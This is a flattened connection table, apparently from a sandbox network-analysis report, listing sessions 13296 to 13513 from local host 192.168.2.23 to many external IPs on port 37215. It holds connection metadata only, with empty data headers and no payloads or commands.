                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13296192.168.2.2350628157.55.235.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13297192.168.2.2334104222.209.237.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13298192.168.2.233888843.10.119.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13299192.168.2.2347286157.161.117.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13300192.168.2.2338524157.133.60.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13301192.168.2.2357236197.236.89.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13302192.168.2.2353250197.208.3.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13303192.168.2.2333350197.231.18.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13304192.168.2.234703041.58.166.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13305192.168.2.2332914197.49.179.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13306192.168.2.2353402157.201.52.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13307192.168.2.2341328113.207.138.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13308192.168.2.2350492176.182.201.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13309192.168.2.2360944157.169.252.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13310192.168.2.2350030197.102.25.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13311192.168.2.235789486.157.20.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13312192.168.2.235887441.21.65.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13313192.168.2.2337888157.19.76.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13314192.168.2.233402836.207.42.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13315192.168.2.233994662.77.77.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13316192.168.2.236051841.165.214.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13317192.168.2.2333886137.96.23.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13318192.168.2.234343041.178.166.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13319192.168.2.2344484130.28.60.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13320192.168.2.2335726197.73.136.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13321192.168.2.2336180114.141.224.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13322192.168.2.2333830157.193.172.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13323192.168.2.235587441.5.31.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13324192.168.2.2335278157.24.129.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13325192.168.2.2352988157.207.138.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13326192.168.2.2355770180.99.191.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13327192.168.2.2351714157.216.44.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13328192.168.2.233447441.170.63.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13329192.168.2.2346736157.175.54.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13330192.168.2.2358346197.140.68.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13331192.168.2.2352008221.202.93.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13332192.168.2.2358024197.47.11.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13333192.168.2.233827041.229.218.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13334192.168.2.2348400197.65.79.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13335192.168.2.2353410197.129.189.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13336192.168.2.2358558197.167.144.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13337192.168.2.236086641.86.238.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13338192.168.2.2340096102.89.10.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13339192.168.2.2346002197.204.56.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13340192.168.2.2345760150.186.136.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13341192.168.2.235168841.116.13.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13342192.168.2.2357572197.162.92.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13343192.168.2.23553742.124.77.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13344192.168.2.2357224197.21.195.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13345192.168.2.235739241.38.134.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13346192.168.2.233572441.126.189.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13347192.168.2.2340360181.202.220.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13348192.168.2.2360108157.197.202.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13349192.168.2.2338072157.38.163.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13350192.168.2.2338064197.41.230.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13351192.168.2.2334134157.80.104.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13352192.168.2.234196841.150.209.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13353192.168.2.2352294148.154.181.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13354192.168.2.233752699.107.69.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13355192.168.2.2343946197.173.190.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13356192.168.2.235240641.145.56.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13357192.168.2.2341074115.185.83.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13358192.168.2.2358504208.13.141.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13359192.168.2.2339980197.39.209.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13360192.168.2.2353780148.89.217.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13361192.168.2.234236612.167.17.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13362192.168.2.2352340189.118.109.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13363192.168.2.2360526197.150.117.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13364192.168.2.2350102197.207.141.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13365192.168.2.2335238197.214.16.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13366192.168.2.2347126157.151.161.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13367192.168.2.234813641.205.87.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13368192.168.2.234013041.176.168.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13369192.168.2.2349826197.128.34.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13370192.168.2.235916441.170.136.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13371192.168.2.2336572197.149.94.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13372192.168.2.2342966157.103.160.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13373192.168.2.2341930197.207.120.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13374192.168.2.233519241.226.241.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13375192.168.2.234019841.24.6.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13376192.168.2.2353928157.240.213.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13377192.168.2.2340252197.62.252.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13378192.168.2.235633041.206.170.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13379192.168.2.2354654197.66.34.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13380192.168.2.2360536197.65.27.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13381192.168.2.235643641.71.198.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13382192.168.2.2333678197.24.208.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13383192.168.2.2349840197.54.184.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13384192.168.2.2333542157.146.171.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13385192.168.2.2344644197.109.132.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13386192.168.2.234333241.66.75.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13387192.168.2.2338582192.46.37.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13388192.168.2.235011441.253.133.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13389192.168.2.2347220157.33.237.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13390192.168.2.2346448197.90.234.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13391192.168.2.233523041.243.39.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13392192.168.2.233468063.40.19.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13393192.168.2.2359704197.7.28.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13394192.168.2.2360762197.19.133.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13395192.168.2.2355446108.220.87.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13396192.168.2.235404841.223.176.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13397192.168.2.2340656197.31.90.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13398192.168.2.2355320197.241.203.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13399192.168.2.2340422157.252.1.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13400192.168.2.2342932197.197.222.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13401192.168.2.235704241.124.28.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13402192.168.2.2348642208.2.210.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13403192.168.2.2344644157.163.95.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13404192.168.2.235698441.133.47.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13405192.168.2.2342594157.13.96.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13406192.168.2.2343590125.16.104.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13407192.168.2.2357268153.48.142.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13408192.168.2.2332998197.72.2.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13409192.168.2.235319841.119.26.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13410192.168.2.234824641.25.162.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13411192.168.2.235324041.76.168.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13412192.168.2.2338154157.53.85.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13413192.168.2.2349130157.110.193.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13414192.168.2.2355594150.252.116.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13415192.168.2.235946841.136.180.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13416192.168.2.2340238157.49.104.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13417192.168.2.2340470197.219.163.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13418192.168.2.236038241.219.174.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13419192.168.2.233458041.64.125.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13420192.168.2.2343292157.17.181.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13421192.168.2.2344590157.49.5.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13422192.168.2.2335306157.143.136.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13423192.168.2.2337524157.204.22.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13424192.168.2.233555841.176.11.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13425192.168.2.233935441.118.194.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13426192.168.2.2357352157.196.208.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13427192.168.2.2348526157.27.238.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13428192.168.2.2341960164.172.140.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13429192.168.2.2354748157.66.21.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13430192.168.2.235100041.61.237.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13431192.168.2.2336764197.132.78.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13432192.168.2.235065041.61.106.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13433192.168.2.2335218157.2.189.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13434192.168.2.2333722157.199.132.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13435192.168.2.235385241.6.7.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13436192.168.2.2335994197.205.49.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13437192.168.2.2337646104.123.68.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13438192.168.2.2353176197.192.107.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13439192.168.2.2337462189.199.23.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13440192.168.2.2353028197.209.233.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13441192.168.2.2345516157.178.88.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13442192.168.2.2351964217.93.165.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13443192.168.2.2337838157.156.41.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13444192.168.2.2359908157.153.146.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13445192.168.2.2345966197.116.45.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13446192.168.2.2341596157.197.205.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13447192.168.2.2351682197.40.209.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13448192.168.2.2341642197.59.224.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13449192.168.2.2340268157.9.229.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13450192.168.2.2340274197.118.9.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13451192.168.2.2351486185.78.130.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13452192.168.2.2356144197.27.102.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13453192.168.2.2360388197.188.245.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13454192.168.2.2354342110.51.39.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13455192.168.2.2357476204.241.150.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13456192.168.2.235248437.250.49.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13457192.168.2.233489047.39.24.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13458192.168.2.2358102157.137.172.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13459192.168.2.2341538197.44.206.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13460192.168.2.2347946197.95.246.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13461192.168.2.234427060.172.127.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13462192.168.2.2338158197.31.228.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13463192.168.2.233689641.30.182.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13464192.168.2.2353634157.106.89.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13465192.168.2.2342808197.144.217.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13466192.168.2.234975463.149.52.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13467192.168.2.2354052186.127.187.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13468192.168.2.235978041.213.193.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13469192.168.2.235697441.142.215.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13470192.168.2.233636441.132.206.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13471192.168.2.2349550195.192.151.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13472192.168.2.235395841.221.24.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13473192.168.2.2341664157.92.176.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13474192.168.2.2355160197.90.147.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13475192.168.2.235166241.189.31.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13476192.168.2.235734641.70.19.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13477192.168.2.2334198197.243.38.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13478192.168.2.2341124146.14.8.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13479192.168.2.2340452197.75.164.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13480192.168.2.2355602197.43.26.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13481192.168.2.234212441.219.172.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13482192.168.2.2350590157.105.165.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13483192.168.2.2333624153.68.32.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13484192.168.2.2355736130.111.206.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13485192.168.2.2353988197.7.225.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13486192.168.2.2336996197.164.134.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13487192.168.2.233996896.4.90.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13488192.168.2.2348358157.212.119.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13489192.168.2.2360334157.77.131.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13490192.168.2.236074681.28.94.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13491192.168.2.2346532136.31.113.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13492192.168.2.2342874157.105.189.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13493192.168.2.233574041.251.172.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13494192.168.2.2352032157.65.130.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13495192.168.2.233577041.206.137.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13496192.168.2.234631641.25.222.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13497192.168.2.234697241.137.159.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13498192.168.2.2336340197.48.165.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13499192.168.2.2358148143.176.90.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13500192.168.2.2360998157.208.68.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13501192.168.2.2358846197.111.12.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13502192.168.2.2338648157.253.172.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13503192.168.2.2352128197.48.106.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13504192.168.2.2350006157.102.85.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13505192.168.2.233860641.39.203.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13506192.168.2.2358990124.161.14.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13507192.168.2.233925041.240.194.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13508192.168.2.2351460157.63.166.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13509192.168.2.2346514197.153.110.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13510192.168.2.234871060.20.203.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13511192.168.2.2340198210.252.86.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13512192.168.2.2340144157.245.41.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13513192.168.2.2343338157.235.102.20937215
                                          TimestampBytes transferredDirectionData


